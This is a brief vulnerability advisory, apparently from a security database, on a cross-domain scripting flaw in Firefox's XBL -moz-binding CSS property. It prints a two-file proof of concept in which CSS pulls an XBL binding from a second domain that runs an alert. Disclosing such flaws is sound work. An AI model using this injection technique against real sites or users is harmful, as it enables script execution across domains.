|
Mozilla Firefox XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability
The following proof of concept examples are available: http://domain1/path/to/page.html : <html> <head> <style> body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); } </style> </head> <body> </body> </html> http://domain2/path/to/xbl.xml : <?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml"> <binding id="xss"> <implementation> <constructor> alert("XBL XSS"); </constructor> </implementation> </binding> </bindings> https://bugzilla.mozilla.org/attachment.cgi?id=209241 |
|
|
Privacy Statement |
